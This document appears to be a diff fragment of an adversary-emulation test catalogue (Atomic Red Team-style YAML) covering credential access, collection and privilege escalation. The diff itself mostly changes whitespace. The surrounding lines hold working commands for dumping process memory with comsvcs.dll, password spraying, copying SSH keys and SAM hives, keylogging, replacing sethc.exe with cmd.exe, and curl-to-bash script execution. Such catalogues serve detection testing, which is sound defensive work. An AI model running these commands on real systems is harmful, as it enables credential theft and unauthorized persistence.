-'
+          '
         prereq_command: 'if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
@@ -4102,7 +4102,7 @@ credential-access:
           C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
         cleanup_command: 'Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
 
-'
+          '
         name: powershell
         elevation_required: true
   T1110.002:
@@ -4270,7 +4270,7 @@ credential-access:
       description: 'Uses PowerShell to install and register a password filter DLL.
         Requires a reboot and administrative privileges.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -4283,14 +4283,14 @@ credential-access:
       - description: 'AtomicPasswordFilter.dll must exist on disk at specified location
           (#{input_dll})
 
-'
+          '
         prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Write-Host "You must provide your own password filter
           dll"
 
-'
+          '
       executor:
         command: |
           $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
@@ -4382,7 +4382,7 @@ credential-access:
       description: 'Creates username and password files then attempts to brute force
         Active Directory accounts on remote host
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -4422,7 +4422,7 @@ credential-access:
       description: 'Attempt to brute force Active Directory domain user on a domain
         controller, via LDAP, with NTLM or Kerberos
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -4472,7 +4472,7 @@ credential-access:
       auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69
       description: 'Attempt to brute force Azure AD user via AzureAD powershell module.
 
-'
+        '
       supported_platforms:
       - azure-ad
       input_arguments:
@@ -4489,13 +4489,13 @@ credential-access:
       dependencies:
       - description: 'AzureAD module must be installed.
 
-'
+          '
         prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Install-Module -Name AzureAD -Force
 
-'
+          '
       executor:
         name: powershell
         elevation_required: false
@@ -4681,13 +4681,13 @@ credential-access:
       dependencies:
       - description: 'List of domain users to password spray must exits at %temp%\users.txt
 
-'
+          '
         prereq_command: 'if not exist %temp%\users.txt (exit /b 1)
 
-'
+          '
         get_prereq_command: 'PathToAtomicsFolder\T1110.003\src\parse_net_users.bat
 
-'
+          '
       executor:
         name: command_prompt
         elevation_required: false
@@ -4695,7 +4695,7 @@ credential-access:
           /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password}
           && @net use /delete %logonserver%\IPC$ > NUL
 
-'
+          '
     - name: Password Spray (DomainPasswordSpray)
       auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b
       description: |
@@ -4794,13 +4794,13 @@ credential-access:
       dependencies:
       - description: 'AzureAD module must be installed.
 
-'
+          '
         prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Install-Module -Name AzureAD -Force
 
-'
+          '
       executor:
         name: powershell
         elevation_required: false
@@ -4967,14 +4967,14 @@ credential-access:
       executor:
         command: 'dir c:\ /b /s .key | findstr /e .key
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Discover Private SSH Keys
       auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878
       description: 'Discover private SSH keys on a macOS or Linux system.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -4990,17 +4990,17 @@ credential-access:
       executor:
         command: 'find #{search_path} -name id_rsa >> #{output_file}
 
-'
+          '
         cleanup_command: 'rm #{output_file}
 
-'
+          '
         name: sh
     - name: Copy Private SSH Keys with CP
       auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3
       description: 'Copy private SSH keys on a Linux system to a staging folder using
         the `cp` command.
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -5018,14 +5018,14 @@ credential-access:
           find #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \;
         cleanup_command: 'rm #{output_folder}
 
-'
+          '
         name: sh
     - name: Copy Private SSH Keys with rsync
       auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a
       description: 'Copy private SSH keys on a Linux or macOS system to a staging
         folder using the `rsync` command.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -5044,14 +5044,14 @@ credential-access:
           find #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \;
         cleanup_command: 'rm -rf #{output_folder}
 
-'
+          '
         name: sh
     - name: Copy the users GnuPG directory with rsync
       auto_generated_guid: 2a5a0601-f5fb-4e2e-aa09-73282ae6afca
       description: 'Copy the users GnuPG (.gnupg) directory on a Mac or Linux system
         to a staging folder using the `rsync` command.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -5070,7 +5070,7 @@ credential-access:
           find #{search_path} -type d -name '.gnupg' -exec rsync -Rr {} #{output_folder} \;
         cleanup_command: 'rm -rf #{output_folder}
 
-'
+          '
         name: sh
   T1003.007:
     technique:
@@ -5138,7 +5138,7 @@ credential-access:
       dependencies:
       - description: 'Script to launch target process must exist
 
-'
+          '
         prereq_command: |
           test -f #{script_path}
           grep "#{pid_term}" #{script_path}
@@ -5159,7 +5159,7 @@ credential-access:
           grep -i "PASS" "#{output_file}"
         cleanup_command: 'rm -f "#{output_file}"
 
-'
+          '
     - name: Dump individual process memory with Python (Local)
       auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
       description: |
@@ -5187,7 +5187,7 @@ credential-access:
       dependencies:
       - description: 'Script to launch target process must exist
 
-'
+          '
         prereq_command: |
           test -f #{script_path}
           grep "#{pid_term}" #{script_path}
@@ -5196,11 +5196,11 @@ credential-access:
           echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
       - description: 'Requires Python
 
-'
+          '
         prereq_command: "(which python || which python3 || which python2)\n"
         get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed"
 
-'
+          '
       executor:
         name: sh
         elevation_required: true
@@ -5212,7 +5212,7 @@ credential-access:
           grep -i "PASS" "#{output_file}"
         cleanup_command: 'rm -f "#{output_file}"
 
-'
+          '
   T1606.002:
     technique:
       external_references:
@@ -5359,42 +5359,42 @@ credential-access:
       auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
       description: 'Parses registry hives to obtain stored credentials
 
-'
+        '
       supported_platforms:
       - windows
       dependency_executor_name: command_prompt
       dependencies:
       - description: 'Computer must have python 3 installed
 
-'
+          '
         prereq_command: |
           py -3 --version >nul 2>&1
           exit /b %errorlevel%
         get_prereq_command: 'echo "Python 3 must be installed manually"
 
-'
+          '
       - description: 'Computer must have pip installed
 
-'
+          '
         prereq_command: |
           py -3 -m pip --version >nul 2>&1
           exit /b %errorlevel%
         get_prereq_command: 'echo "PIP must be installed manually"
 
-'
+          '
       - description: 'pypykatz must be installed and part of PATH
 
-'
+          '
         prereq_command: |
           pypykatz -h >nul 2>&1
           exit /b %errorlevel%
         get_prereq_command: 'pip install pypykatz
 
-'
+          '
       executor:
         command: 'pypykatz live registry
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: esentutl.exe SAM copy
@@ -5420,12 +5420,12 @@ credential-access:
       executor:
         command: 'esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
 
-'
+          '
         name: command_prompt
         elevation_required: true
         cleanup_command: 'del #{copy_dest}\#{file_name} >nul 2>&1
 
-'
+          '
     - name: PowerDump Registry dump of SAM for hashes and usernames
       auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193
       description: Executes a hashdump by reading the hasshes from the registry.
@@ -5478,7 +5478,7 @@ credential-access:
       auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0
       description: 'Dump hives from volume shadow copies with System.IO.File
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -6293,7 +6293,7 @@ collection:
         elevation_required: false
         command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
 
-'
+          '
         cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore'
   T1560.003:
     technique:
@@ -6389,7 +6389,7 @@ collection:
       auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8
       description: 'Uses GZip from Python to compress files
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -6405,10 +6405,10 @@ collection:
       dependencies:
       - description: 'Requires Python
 
-'
+          '
         prereq_command: 'which_python=`which python`; $which_python -V
 
-'
+          '
         get_prereq_command: ''
       executor:
         name: bash
@@ -6416,15 +6416,15 @@ collection:
         command: '$which_python -c "import gzip;input_file=open(''#{path_to_input_file}'',
           ''rb'');content=input_file.read();input_file.close();output_file=gzip.GzipFile(''#{path_to_output_file}'',''wb'',''compresslevel=6'');output_file.write(content);output_file.close();"
 
-'
+          '
         cleanup_command: 'rm #{path_to_output_file}
 
-'
+          '
     - name: Compressing data using bz2 in Python (Linux)
       auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d
       description: 'Uses bz2 from Python to compress files
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -6440,25 +6440,25 @@ collection:
       dependencies:
       - description: 'Requires Python
 
-'
+          '
         prereq_command: 'which_python=`which python`; $which_python -V
 
-'
+          '
         get_prereq_command: ''
       executor:
         name: bash
         elevation_required: false
         command: '$which_python -c "import bz2;input_file=open(''#{path_to_input_file}'',''rb'');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open(''#{path_to_output_file}'',''w+'');output_file.write(bz2content);output_file.close();"
 
-'
+          '
         cleanup_command: 'rm #{path_to_output_file}
 
-'
+          '
     - name: Compressing data using zipfile in Python (Linux)
       auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0
       description: 'Uses zipfile from Python to compress files
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -6474,10 +6474,10 @@ collection:
       dependencies:
       - description: 'Requires Python
 
-'
+          '
         prereq_command: 'which_python=`which python`; $which_python -V
 
-'
+          '
         get_prereq_command: ''
       executor:
         name: bash
@@ -6485,15 +6485,15 @@ collection:
         command: '$which_python -c "from zipfile import ZipFile; ZipFile(''#{path_to_output_file}'',
           mode=''w'').write(''#{path_to_input_file}'')"
 
-'
+          '
         cleanup_command: 'rm #{path_to_output_file}
 
-'
+          '
     - name: Compressing data using tarfile in Python (Linux)
       auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db
       description: 'Uses tarfile from Python to compress files
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -6509,10 +6509,10 @@ collection:
       dependencies:
       - description: 'Requires Python
 
-'
+          '
         prereq_command: 'which_python=`which python`; $which_python -V
 
-'
+          '
         get_prereq_command: ''
       executor:
         name: bash
@@ -6521,7 +6521,7 @@ collection:
           mode='w').write('#{path_to_input_file}')\" \n"
         cleanup_command: 'rm #{path_to_output_file}
 
-'
+          '
   T1560.001:
     technique:
       created: '2020-02-20T21:01:25.428Z'
@@ -6604,10 +6604,10 @@ collection:
       dependencies:
       - description: 'Rar tool must be installed at specified location (#{rar_exe})
 
-'
+          '
         prereq_command: 'if not exist "#{rar_exe}" (exit /b 1)
 
-'
+          '
         get_prereq_command: |
           echo Downloading Winrar installer
           bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer}
@@ -6617,10 +6617,10 @@ collection:
         elevation_required: false
         command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension}
 
-'
+          '
         cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1
 
-'
+          '
     - name: Compress Data and lock with password for Exfiltration with winrar
       auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c
       description: |
@@ -6640,10 +6640,10 @@ collection:
       dependencies:
       - description: 'Rar tool must be installed at specified location (#{rar_exe})
 
-'
+          '
         prereq_command: 'if not exist "#{rar_exe}" (exit /b 1)
 
-'
+          '
         get_prereq_command: |
           echo Downloading Winrar installer
           bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer}
@@ -6681,11 +6681,11 @@ collection:
       dependencies:
       - description: 'Winzip must be installed
 
-'
+          '
         prereq_command: 'cmd /c ''if not exist "#{winzip_exe}" (echo 1) else (echo
           0)''
 
-'
+          '
         get_prereq_command: |
           if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
             Write-Host Follow the installation prompts to continue
@@ -6705,7 +6705,7 @@ collection:
       auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198
       description: 'Note: Requires 7zip installation
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -6720,10 +6720,10 @@ collection:
       dependencies:
       - description: '7zip tool must be installed at specified location (#{7zip_exe})
 
-'
+          '
         prereq_command: 'if not exist "#{7zip_exe}" (exit /b 1)
 
-'
+          '
         get_prereq_command: |
           echo Downloading 7-zip installer
           bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer}
@@ -6742,7 +6742,7 @@ collection:
       description: 'An adversary may compress data (e.g., sensitive documents) that
         is collected prior to exfiltration. This test uses standard zip compression.
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -6759,30 +6759,30 @@ collection:
       dependencies:
       - description: 'Files to zip must exist (#{input_files})
 
-'
+          '
         prereq_command: 'if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else
           exit 1; fi;
 
-'
+          '
         get_prereq_command: 'echo Please set input_files argument to include files
           that exist
 
-'
+          '
       executor:
         name: sh
         elevation_required: false
         command: 'zip #{output_file} #{input_files}
 
-'
+          '
         cleanup_command: 'rm -f #{output_file}
 
-'
+          '
     - name: Data Compressed - nix - gzip Single File
       auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af
       description: 'An adversary may compress data (e.g., sensitive documents) that
         is collected prior to exfiltration. This test uses standard gzip compression.
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -6802,16 +6802,16 @@ collection:
         command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}''
           >> #{input_file}; gzip -k #{input_file})
 
-'
+          '
         cleanup_command: 'rm -f #{input_file}.gz
 
-'
+          '
     - name: Data Compressed - nix - tar Folder or File
       auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a
       description: 'An adversary may compress data (e.g., sensitive documents) that
         is collected prior to exfiltration. This test uses standard gzip compression.
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -6827,28 +6827,28 @@ collection:
       dependencies:
       - description: 'Folder to zip must exist (#{input_file_folder})
 
-'
+          '
         prereq_command: 'test -e #{input_file_folder}
 
-'
+          '
         get_prereq_command: 'echo Please set input_file_folder argument to a folder
           that exists
 
-'
+          '
       executor:
         name: sh
         elevation_required: false
         command: 'tar -cvzf #{output_file} #{input_file_folder}
 
-'
+          '
         cleanup_command: 'rm -f #{output_file}
 
-'
+          '
     - name: Data Encrypted with zip and gpg symmetric
       auto_generated_guid: '0286eb44-e7ce-41a0-b109-3da516e05a5f'
       description: 'Encrypt data for exiltration
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -6871,10 +6871,10 @@ collection:
         prereq_command: 'if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)"
           ]; then exit 1; fi;
 
-'
+          '
         get_prereq_command: 'echo "Install gpg and zip to run the test"; exit 1;
 
-'
+          '
       executor:
         name: sh
         elevation_required: false
@@ -6886,7 +6886,7 @@ collection:
           ls -l #{test_folder}
         cleanup_command: 'rm -Rf #{test_folder}
 
-'
+          '
   T1123:
     technique:
       id: attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967
@@ -6936,7 +6936,7 @@ collection:
       executor:
         command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
 
-'
+          '
         name: powershell
   T1119:
     technique:
@@ -7006,7 +7006,7 @@ collection:
           for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection
         cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
 
-'
+          '
         name: command_prompt
     - name: Automated Collection PowerShell
       auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313
@@ -7022,7 +7022,7 @@ collection:
         cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force
           -ErrorAction Ignore | Out-Null
 
-'
+          '
         name: powershell
     - name: Recon information for export with PowerShell
       auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26
@@ -7111,7 +7111,7 @@ collection:
       auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7
       description: 'Add data to clipboard to copy off or execute commands from.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -7121,14 +7121,14 @@ collection:
           clip < %temp%\T1115.txt
         cleanup_command: 'del %temp%\T1115.txt >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Execute Commands from Clipboard using PowerShell
       auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416
       description: 'Utilize PowerShell to echo a command to clipboard and execute
         it
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -7151,7 +7151,7 @@ collection:
       description: 'This module copies the data stored in the user''s clipboard and
         writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -7163,7 +7163,7 @@ collection:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-'
+          '
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -7174,7 +7174,7 @@ collection:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-'
+          '
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -7184,7 +7184,7 @@ collection:
         cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt"
           -ErrorAction Ignore
 
-'
+          '
         name: powershell
   T1213.001:
     technique:
@@ -7334,7 +7334,7 @@ collection:
       auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33
       description: 'Hooks functions in PowerShell to read TLS Communications
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -7350,10 +7350,10 @@ collection:
       dependencies:
       - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name})
 
-'
+          '
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}"
@@ -7906,7 +7906,7 @@ collection:
           to apply changes." & return & return  default answer "" with icon 1 with
           hidden answer with title "Software Update"''
 
-'
+          '
         name: bash
     - name: PowerShell - Prompt User for Password
       auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
@@ -8077,7 +8077,7 @@ collection:
           .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath}
         cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
 
-'
+          '
         name: powershell
         elevation_required: true
     - name: Living off the land Terminal Input Capture on Linux with pam.d
@@ -8096,14 +8096,14 @@ collection:
       dependencies:
       - description: 'Checking if pam_tty_audit.so is installed
 
-'
+          '
         prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o  /usr/lib64/security/pam_tty_audit.so''
 
-'
+          '
         get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so
           and recompile, for this test to work"
 
-'
+          '
       supported_platforms:
       - linux
       executor:
@@ -8276,17 +8276,17 @@ collection:
         command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat"
           -OutFile #{output_file}
 
-'
+          '
         cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Stage data from Discovery.sh
       auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066
       description: 'Utilize curl to download discovery.sh and execute a basic information
         gathering shell script
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -8299,7 +8299,7 @@ collection:
         command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh
           | bash -s > #{output_file}
 
-'
+          '
         name: bash
     - name: Zip a Folder with PowerShell for Staging in Temp
       auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a
@@ -8321,10 +8321,10 @@ collection:
         command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file}
           -Force
 
-'
+          '
         cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore
 
-'
+          '
         name: powershell
   T1114.001:
     technique:
@@ -8395,23 +8395,23 @@ collection:
       dependencies:
       - description: 'Get-Inbox.ps1 must be located at #{file_path}
 
-'
+          '
         prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit
           1}
 
-'
+          '
         get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1"
           -OutFile "#{file_path}\Get-Inbox.ps1"
 
-'
+          '
       executor:
         command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1
           -file #{output_file}
 
-'
+          '
         cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore
 
-'
+          '
         name: powershell
   T1185:
     technique:
@@ -8751,7 +8751,7 @@ collection:
         or <code>screencapture</code>.(Citation: CopyFromScreen .NET)(Citation: Antiquated
         Mac Malware)
 
-'
+        '
       name: Screen Capture
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       id: attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688
@@ -8783,7 +8783,7 @@ collection:
       auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac
       description: 'Use screencapture command to collect a full desktop screenshot
 
-'
+        '
       supported_platforms:
       - macos
       input_arguments:
@@ -8794,16 +8794,16 @@ collection:
       executor:
         command: 'screencapture #{output_file}
 
-'
+          '
         cleanup_command: 'rm #{output_file}
 
-'
+          '
         name: bash
     - name: Screencapture (silent)
       auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4
       description: 'Use screencapture command to collect a full desktop screenshot
 
-'
+        '
       supported_platforms:
       - macos
       input_arguments:
@@ -8814,17 +8814,17 @@ collection:
       executor:
         command: 'screencapture -x #{output_file}
 
-'
+          '
         cleanup_command: 'rm #{output_file}
 
-'
+          '
         name: bash
     - name: X Windows Capture
       auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac
       description: 'Use xwd command to collect a full desktop screenshot and review
         file with xwud
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -8846,11 +8846,11 @@ collection:
       dependencies:
       - description: 'Package with XWD and XWUD must exist on device
 
-'
+          '
         prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit
           1; fi
 
-'
+          '
         get_prereq_command: "sudo #{package_installer} \n"
       executor:
         command: |
@@ -8858,14 +8858,14 @@ collection:
           xwud -in #{output_file}
         cleanup_command: 'rm #{output_file}
 
-'
+          '
         name: bash
     - name: Capture Linux Desktop using Import Tool
       auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1
       description: 'Use import command from ImageMagick to collect a full desktop
         screenshot
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -8876,28 +8876,28 @@ collection:
       dependencies:
       - description: 'ImageMagick must be installed
 
-'
+          '
         prereq_command: 'if import -help > /dev/null 2>&1; then exit 0; else exit
           1; fi
 
-'
+          '
         get_prereq_command: 'sudo apt-get -y install graphicsmagick-imagemagick-compat
 
-'
+          '
       executor:
         command: 'import -window root #{output_file}
 
-'
+          '
         cleanup_command: 'rm #{output_file}
 
-'
+          '
         name: bash
     - name: Windows Screencapture
       auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153
       description: 'Use Psr.exe binary to collect screenshots of user display. Test
         will do left mouse click to simulate user behaviour
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -8919,7 +8919,7 @@ collection:
           cmd /c "timeout #{recording_time} > NULL && psr.exe /stop"
         cleanup_command: 'rm #{output_file} -ErrorAction Ignore
 
-'
+          '
   T1213.002:
     technique:
       external_references:
@@ -9308,7 +9308,7 @@ privilege-escalation:
           description: 'Comma separated list of system binaries to which you want
             to attach each #{attached_process}. Default: "osk.exe"
 
-'
+            '
           type: String
           default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe,
             atbroker.exe
@@ -9316,7 +9316,7 @@ privilege-escalation:
           description: 'Full path to process to attach to target in #{parent_list}.
             Default: cmd.exe
 
-'
+            '
           type: Path
           default: C:\windows\system32\cmd.exe
       executor:
@@ -9350,7 +9350,7 @@ privilege-escalation:
       auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
       description: 'Replace sticky keys binary (sethc.exe) with cmd.exe
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -9361,7 +9361,7 @@ privilege-escalation:
           copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
         cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
 
-'
+          '
         name: command_prompt
         elevation_required: true
   T1547.014:
@@ -9620,11 +9620,11 @@ privilege-escalation:
       - description: 'Reg files must exist on disk at specified locations (#{registry_file}
           and #{registry_cleanup_file})
 
-'
+          '
         prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file}))
           {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null
@@ -9633,11 +9633,11 @@ privilege-escalation:
       - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and
           T1546.010x86.dll)
 
-'
+          '
         prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll))
           {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll
@@ -9645,10 +9645,10 @@ privilege-escalation:
       executor:
         command: 'reg.exe import #{registry_file}
 
-'
+          '
         cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
   T1546.011:
@@ -9756,31 +9756,31 @@ privilege-escalation:
       - description: 'Shim database file must exist on disk at specified location
           (#{file_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}"
       - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll
 
-'
+          '
         prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit
           1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll
       executor:
         command: 'sdbinst.exe #{file_path}
 
-'
+          '
         cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: New shim database files created in the default shim database directory
@@ -9978,7 +9978,7 @@ privilege-escalation:
       description: 'This test submits a command to be run in the future by the `at`
         daemon.
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -9994,30 +9994,30 @@ privilege-escalation:
       dependencies:
       - description: 'The `at` and `atd` executables must exist in the PATH
 
-'
+          '
         prereq_command: 'which at && which atd
 
-'
+          '
         get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found
           in the PATH (Package name: `at`)''
 
-'
+          '
       - description: 'The `atd` daemon must be running
 
-'
+          '
         prereq_command: 'systemctl status atd || service atd status
 
-'
+          '
         get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service
           atd start` ; systemd: `systemctl start atd`)''
 
-'
+          '
       executor:
         name: sh
         elevation_required: false
         command: 'echo "#{at_command}" | at #{time_spec}
 
-'
+          '
   T1053.002:
     technique:
       external_references:
@@ -10114,7 +10114,7 @@ privilege-escalation:
         elevation_required: false
         command: 'at 13:20 /interactive cmd
 
-'
+          '
   T1547.002:
     technique:
       id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec
